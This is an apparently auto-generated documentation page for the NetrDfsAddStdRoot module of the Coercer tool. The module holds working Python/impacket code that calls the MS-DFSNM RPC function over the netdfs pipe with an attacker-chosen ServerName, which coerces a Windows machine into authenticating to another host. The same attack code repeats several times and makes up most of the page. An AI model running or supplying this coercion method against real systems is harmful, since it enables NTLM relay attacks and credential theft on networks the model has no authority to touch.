coercer.methods.MS_DFSNM.NetrDfsAddStdRoot

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : NetrDfsAddStdRoot.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 14 Sep 2022
 6
 7from coercer.core.utils import gen_random_name
 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 9from coercer.network.DCERPCSessionError import DCERPCSessionError
10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
12
13
14class _NetrDfsAddStdRoot(NDRCALL):
15    """
16    Structure to make the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol
17    """
18    opnum = 12
19    structure = (
20        ('ServerName', WSTR),  # Type: WCHAR *
21        ('RootShare', WSTR),   # Type: WCHAR *
22        ('Comment', WSTR),     # Type: WCHAR *
23        ('ApiFlags', DWORD),   # Type: DWORD
24    )
25
26
27class _NetrDfsAddStdRootResponse(NDRCALL):
28    """
29    Structure to parse the response of the RPC call to NetrDfsAddStdRoot() in MS-DFSNM Protocol
30    """
31    structure = ()
32
33
34class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
35    """
36    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
37
38    Method found by:
39     - [@filip_dragovic](https://twitter.com/filip_dragovic)
40    """
41
42    access = {
43        "ncan_np": [
44            {
45                "namedpipe": r"\PIPE\netdfs",
46                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
47                "version": "3.0"
48            }
49        ]
50    }
51
52    protocol = {
53        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
54        "shortname": "MS-DFSNM"
55    }
56
57    function = {
58        "name": "NetrDfsAddStdRoot",
59        "opnum": 12,
60        "vulnerable_arguments": ["ServerName"]
61    }
62
63    def trigger(self, dcerpc_session):
64        if dcerpc_session is not None:
65            try:
66                request = _NetrDfsAddStdRoot()
67                request['ServerName'] = self.path
68                request['RootShare'] = gen_random_name() + '\x00'
69                request['Comment'] = gen_random_name() + '\x00'
70                request['ApiFlags'] = 0
71                resp = dcerpc_session.request(request)
72                return ""
73            except Exception as err:
74                return err
75        else:
76            print("[!] Error: dce is None, you must call connect() first.")
77            return None
class NetrDfsAddStdRoot(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
35class NetrDfsAddStdRoot(MSPROTOCOLRPCCALL):
36    """
37    Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)
38
39    Method found by:
40     - [@filip_dragovic](https://twitter.com/filip_dragovic)
41    """
42
43    access = {
44        "ncan_np": [
45            {
46                "namedpipe": r"\PIPE\netdfs",
47                "uuid": "4fc742e0-4a10-11cf-8273-00aa004ae673",
48                "version": "3.0"
49            }
50        ]
51    }
52
53    protocol = {
54        "longname": "[MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol",
55        "shortname": "MS-DFSNM"
56    }
57
58    function = {
59        "name": "NetrDfsAddStdRoot",
60        "opnum": 12,
61        "vulnerable_arguments": ["ServerName"]
62    }
63
64    def trigger(self, dcerpc_session):
65        if dcerpc_session is not None:
66            try:
67                request = _NetrDfsAddStdRoot()
68                request['ServerName'] = self.path
69                request['RootShare'] = gen_random_name() + '\x00'
70                request['Comment'] = gen_random_name() + '\x00'
71                request['ApiFlags'] = 0
72                resp = dcerpc_session.request(request)
73                return ""
74            except Exception as err:
75                return err
76        else:
77            print("[!] Error: dce is None, you must call connect() first.")
78            return None

Coercing a machine to authenticate using function NetrDfsAddStdRoot (opnum 12) of [MS-DFSNM]: Distributed File System (DFS): Namespace Management Protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dfsnm/95a506a8-cae6-4c42-b19d-9c1ed1223979)

Method found by:

def trigger(self, dcerpc_session):
64    def trigger(self, dcerpc_session):
65        if dcerpc_session is not None:
66            try:
67                request = _NetrDfsAddStdRoot()
68                request['ServerName'] = self.path
69                request['RootShare'] = gen_random_name() + '\x00'
70                request['Comment'] = gen_random_name() + '\x00'
71                request['ApiFlags'] = 0
72                resp = dcerpc_session.request(request)
73                return ""
74            except Exception as err:
75                return err
76        else:
77            print("[!] Error: dce is None, you must call connect() first.")
78            return None